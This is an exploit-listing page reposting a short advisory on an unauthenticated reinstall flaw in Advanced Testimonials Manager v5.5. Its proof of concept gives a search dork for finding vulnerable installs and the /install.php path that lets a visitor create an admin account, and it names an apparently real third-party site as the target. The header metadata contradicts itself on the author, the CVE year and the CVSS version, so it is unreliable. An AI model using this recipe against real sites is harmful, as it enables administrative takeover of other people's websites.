Advertisement






Advanced Testimonials Manager v5.5 Reinstall Add Admin Vulnerability

CVE Category Price Severity
CVE-2015-1434 CWE-284 $1,000 High
Author Risk Exploitation Type Date
Mike Czumak High Remote 2022-07-06
CPE
cpe:cpe:/a:advanced_testimonials_manager:advanced_testimonials_manager:5.5
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070020

Below is a copy:

Advanced Testimonials Manager v5.5 Reinstall Add Admin Vulnerability
====================================================================================================================================
| # Title     : Advanced Testimonials Manager v5.5 Reinstall Add Admin Vulnerability                                               |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | 
| # Vendor    : https://codecanyon.net/item/advanced-testimonials-manager/113257?s_rank=194                                        |  
| # Dork      : Advanced Testimonial Manager                                                                                       |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use payload : /install.php

[+] http://www.propertymanagementrv.com/testimonials/install.php = add your information to login

==Greetings to :=========================================================================================================================
|                                                                                                                                       |
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* thelastvvv *Zigoo.eg * moncet              |
|                                                                                                                                       |
=========================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.